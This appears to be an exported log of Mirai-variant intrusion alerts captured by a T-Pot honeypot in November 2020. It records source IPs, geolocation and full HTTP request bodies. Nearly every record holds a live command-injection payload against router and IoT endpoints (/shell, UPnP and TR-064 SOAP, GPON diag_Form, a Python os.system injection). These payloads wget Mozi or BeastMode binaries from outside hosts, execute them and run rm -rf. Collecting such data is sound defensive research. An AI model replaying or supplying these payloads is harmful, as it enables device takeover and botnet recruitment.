T-Pot honeypot experiment on DigitalOcean [https://github.com/telekom-security/tpotce]
"@timestamp","alert.signature","http.http_request_body_printable","src_ip","src_port","geoip.country_name","payload_printable","http.url","geoip.as_org","geoip.city_name","geoip.asn" | |
"Nov 8, 2020 @ 23:17:59.126","ET SCAN ELF/Mirai Variant User-Agent (Inbound)","action=sendPasswordEmail&user_name=admin' or 1=1--`;`wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor`;` | |
","94.200.76.222",49573,"United Arab Emirates","POST /cgi HTTP/1.1 | |
User-Agent: XTC | |
Host: 127.0.0.1:8089 | |
Content-Length: 172 | |
Accept-Encoding: application/json | |
action=sendPasswordEmail&user_name=admin' or 1=1--`;`wget${IFS}http://96.30.193.26/arm7${IFS}-O${IFS}/tmp/viktor;${IFS}chmod${IFS}777${IFS}/tmp/viktor;${IFS}/tmp/viktor`;` | |
","/cgi","Emirates Integrated Telecommunications Company PJSC (EITC-DU)",Dubai,15802 | |
"Nov 8, 2020 @ 20:43:30.552","ET SCAN Mirai Variant User-Agent (Inbound)",,"124.167.93.57",35619,China,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","CNCGROUP China169 Backbone",,4837 | |
"Nov 8, 2020 @ 20:08:43.000","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0"" ?><s:Envelope xmlns:s=""http://schemas.xmlsoap.org/soap/envelope/"" s:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><m:AddPortMapping xmlns:m=""urn:schemas-upnp-org:service:WANIPConnection:1""><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://187.68.120.209:33999/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope> | |
","187.68.120.209",53991,Brazil,,"/soap.cgi?service=WANIPConn1","Claro S/A","Rio de Janeiro",22085 | |
"Nov 8, 2020 @ 19:39:22.884","ET SCAN Mirai Variant User-Agent (Inbound)",,"110.52.175.144",26899,China,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","CNCGROUP China169 Backbone",Changsha,4837 | |
"Nov 8, 2020 @ 15:38:17.719","ET SCAN Mirai Variant User-Agent (Inbound)",,"1.60.76.152",19605,China,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","CNCGROUP China169 Backbone",,4837 | |
"Nov 8, 2020 @ 02:14:11.101","ET SCAN Mirai Variant User-Agent (Inbound)",,"156.218.212.23",44764,Egypt,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","TE Data",Alexandria,8452 | |
"Nov 8, 2020 @ 02:08:17.006","ET SCAN Mirai Variant User-Agent (Inbound)",,"197.63.184.227",33732,Egypt,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","TE Data",,8452 | |
"Nov 8, 2020 @ 00:31:03.640","ET SCAN Mirai Variant User-Agent (Inbound)",,"183.157.168.255",44513,China,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws",Chinanet,Taizhou,4134 | |
"Nov 7, 2020 @ 19:14:45.463","ET SCAN ELF/Mirai Variant User-Agent (Inbound)","cpe_ids=__import__('os').system('wget http://178.33.64.107/arm7 -O /tmp/upnp.debug; chmod 777 /tmp/upnp.debug; /tmp/upnp.debug') | |
","74.102.39.43",36567,"United States","GET /live/CPEManager/AXCampaignManager/delete_cpes_by_ids HTTP/1.1 | |
User-Agent: XTC | |
Host: 127.0.0.1:9673 | |
Content-Length: 1000 | |
Accept-Encoding: gzip, deflate | |
Accept-Language: en-US,en;q=0.9 | |
cpe_ids=__import__('os').system('wget http://178.33.64.107/arm7 -O /tmp/upnp.debug; chmod 777 /tmp/upnp.debug; /tmp/upnp.debug') | |
","/live/CPEManager/AXCampaignManager/delete_cpes_by_ids","MCI Communications Services, Inc. d/b/a Verizon Business",Paterson,701 | |
"Nov 7, 2020 @ 18:41:56.707","ET SCAN Mirai Variant User-Agent (Inbound)",,"183.157.172.52",2092,China,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws",Chinanet,Taizhou,4134 | |
"Nov 7, 2020 @ 08:27:20.152","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","220.170.174.22",29280,China,,"/UD/act?1",Chinanet,Guangzhou,4134 | |
"Nov 7, 2020 @ 03:30:25.917","ET SCAN Mirai Variant User-Agent (Inbound)",,"37.211.186.233",56600,Qatar,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","Ooredoo Q.S.C.",Doha,42298 | |
"Nov 6, 2020 @ 22:57:20.467","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0"" ?><s:Envelope xmlns:s=""http://schemas.xmlsoap.org/soap/envelope/"" s:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><m:AddPortMapping xmlns:m=""urn:schemas-upnp-org:service:WANIPConnection:1""><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://42.227.244.188:55717/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope> | |
","42.227.244.188",34081,China,"POST /soap.cgi?service=WANIPConn1 HTTP/1.1 | |
Host: 165.232.58.232:49152 | |
Content-Length: 630 | |
Accept-Encoding: gzip, deflate | |
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping | |
Accept: */* | |
User-Agent: Hello, World | |
Connection: keep-alive | |
<?xml version=""1.0"" ?><s:Envelope xmlns:s=""http://schemas.xmlsoap.org/soap/envelope/"" s:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><m:AddPortMapping xmlns:m=""urn:schemas-upnp-org:service:WANIPConnection:1""><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://42.227.244.188:55717/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope> | |
","/soap.cgi?service=WANIPConn1","CNCGROUP China169 Backbone",Nanyang,4837 | |
"Nov 6, 2020 @ 14:22:15.814","ET SCAN Mirai Variant User-Agent (Inbound)","XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://42.234.233.228:43385/Mozi.m+-O+->/tmp/gpon80","42.234.233.228",34611,China,"POST /GponForm/diag_Form?images/ HTTP/1.1 | |
Host: 127.0.0.1:80 | |
Connection: keep-alive | |
Accept-Encoding: gzip, deflate | |
Accept: */* | |
User-Agent: Hello, World | |
Content-Length: 118 | |
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://42.234.233.228:43385/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0","/GponForm/diag_Form?images/","CNCGROUP China169 Backbone",Chifeng,4837 | |
"Nov 6, 2020 @ 07:56:17.755","ET SCAN Mirai Variant User-Agent (Inbound)",,"156.202.148.43",54685,Egypt,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","TE Data",,8452 | |
"Nov 6, 2020 @ 04:26:09.226","ET SCAN Mirai Variant User-Agent (Inbound)",,"42.59.174.156",40543,China,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","CNCGROUP China169 Backbone",,4837 | |
"Nov 6, 2020 @ 02:06:37.728","ET SCAN Mirai Variant User-Agent (Inbound)",,"156.209.208.252",47566,Egypt,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.153.203.52/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","TE Data",Giza,8452 | |
"Nov 5, 2020 @ 21:53:49.807","ET SCAN Mirai Variant User-Agent (Inbound)",,"218.59.53.181",37315,China,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.95.168.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","CNCGROUP China169 Backbone",Qingdao,4837 | |
"Nov 5, 2020 @ 18:09:50.858","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://72.90.235.219:37495/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","72.90.235.219",51084,"United States","POST /UD/act?1 HTTP/1.1 | |
Host: 127.0.0.1:7574 | |
User-Agent: Hello, world | |
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers | |
Content-Type: text/xml | |
Content-Length: 640 | |
<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://72.90.235.219:37495/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","/UD/act?1","MCI Communications Services, Inc. d/b/a Verizon Business",Irvington,701 | |
"Nov 5, 2020 @ 11:11:22.000","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://125.43.210.46:53267/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","125.43.210.46",54992,China,"POST /UD/act?1 HTTP/1.1 | |
Host: 127.0.0.1:5555 | |
User-Agent: Hello, world | |
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers | |
Content-Type: text/xml | |
Content-Length: 640 | |
<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://125.43.210.46:53267/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","/UD/act?1","CNCGROUP China169 Backbone",,4837 | |
"Nov 5, 2020 @ 10:08:00.678","ET SCAN Mirai Variant User-Agent (Inbound)",,"14.164.78.61",60382,Vietnam,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","VNPT Corp",,45899 | |
"Nov 5, 2020 @ 06:51:34.000","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0"" ?><s:Envelope xmlns:s=""http://schemas.xmlsoap.org/soap/envelope/"" s:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><m:AddPortMapping xmlns:m=""urn:schemas-upnp-org:service:WANIPConnection:1""><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://192.168.1.1:8088/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope> | |
","101.0.38.3",44034,India,,"/soap.cgi?service=WANIPConn1","Broadband Pacenet Pvt. Ltd",Mathura,23682 | |
"Nov 5, 2020 @ 01:12:56.000","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0"" ?><s:Envelope xmlns:s=""http://schemas.xmlsoap.org/soap/envelope/"" s:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><m:AddPortMapping xmlns:m=""urn:schemas-upnp-org:service:WANIPConnection:1""><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://59.93.17.56:60484/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope> | |
","59.93.17.56",50155,India,,"/soap.cgi?service=WANIPConn1","National Internet Backbone",Chennai,9829 | |
"Nov 4, 2020 @ 15:16:39.000","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://58.242.196.133:51452/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","58.242.196.133",44569,China,"POST /UD/act?1 HTTP/1.1 | |
Host: 127.0.0.1:5555 | |
User-Agent: Hello, world | |
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers | |
Content-Type: text/xml | |
Content-Length: 640 | |
<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://58.242.196.133:51452/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","/UD/act?1","CNCGROUP China169 Backbone",,4837 | |
"Nov 4, 2020 @ 02:23:50.194","ET SCAN Mirai Variant User-Agent (Inbound)",,"62.98.145.79",45939,Italy,"GET /shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+45.148.122.143/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","Wind Telecomunicazioni SpA",Nola,1267 | |
"Nov 4, 2020 @ 01:38:28.943","ET SCAN Mirai Variant User-Agent (Inbound)",,"187.163.39.133",47879,Mexico,"GET /shell?cd+/tmp;rm+-rf+*;wget+206.126.81.105/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws HTTP/1.1 | |
User-Agent: Hello, world | |
Host: 127.0.0.1:80 | |
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 | |
Connection: keep-alive | |
","/shell?cd+/tmp;rm+-rf+*;wget+206.126.81.105/beastmode/b3astmode.arm7;chmod+777+/tmp/b3astmode.arm7;sh+/tmp/b3astmode.arm7+BeastMode.Rep.Jaws","Axtel, S.A.B. de C.V.","San Luis Potosí City",6503 | |
"Nov 3, 2020 @ 19:44:26.000","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0"" ?><s:Envelope xmlns:s=""http://schemas.xmlsoap.org/soap/envelope/"" s:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><m:AddPortMapping xmlns:m=""urn:schemas-upnp-org:service:WANIPConnection:1""><NewPortMappingDescription><NewPortMappingDescription><NewLeaseDuration></NewLeaseDuration><NewInternalClient>`cd /tmp;rm -rf *;wget http://117.241.65.38:44046/Mozi.m;/tmp/Mozi.m dlink`</NewInternalClient><NewEnabled>1</NewEnabled><NewExternalPort>634</NewExternalPort><NewRemoteHost></NewRemoteHost><NewProtocol>TCP</NewProtocol><NewInternalPort>45</NewInternalPort></m:AddPortMapping><SOAPENV:Body><SOAPENV:envelope> | |
","117.241.65.38",57290,India,,"/soap.cgi?service=WANIPConn1","National Internet Backbone",Chennai,9829 | |
"Nov 3, 2020 @ 18:53:34.450","ET SCAN Mirai Variant User-Agent (Inbound)","<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","91.234.62.22",61655,Russia,"POST /UD/act?1 HTTP/1.1 | |
Host: 127.0.0.1:7574 | |
User-Agent: Hello, world | |
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers | |
Content-Type: text/xml | |
Content-Length: 640 | |
<?xml version=""1.0""?><SOAP-ENV:Envelope xmlns:SOAP-ENV=""http://schemas.xmlsoap.org/soap/envelope/"" SOAP-ENV:encodingStyle=""http://schemas.xmlsoap.org/soap/encoding/""><SOAP-ENV:Body><u:SetNTPServers xmlns:u=""urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>","/UD/act?1","INKO-Telecom, LLC",Lukhovitsy,198367 | |
"Nov 3, 2020 @ 14:58:04.133","ET SCAN Mirai Variant User-Agent (Inbound)","XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://31.163.149.159:47455/Mozi.m+-O+->/tmp/gpon80","31.163.149.34",38426,Russia,"POST /GponForm/diag_Form?images/ HTTP/1.1 | |
Host: 127.0.0.1:8080 | |
Connection: keep-alive | |
Accept-Encoding: gzip, deflate | |
Accept: */* | |
User-Agent: Hello, World | |
Content-Length: 118 | |
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://31.163.149.159:47455/Mozi.m+-O+->/tmp/gpon8080;sh+/tmp/gpon8080&ipv=0","/GponForm/diag_Form?images/","PJSC Rostelecom",Dalmatovo,12389 | |
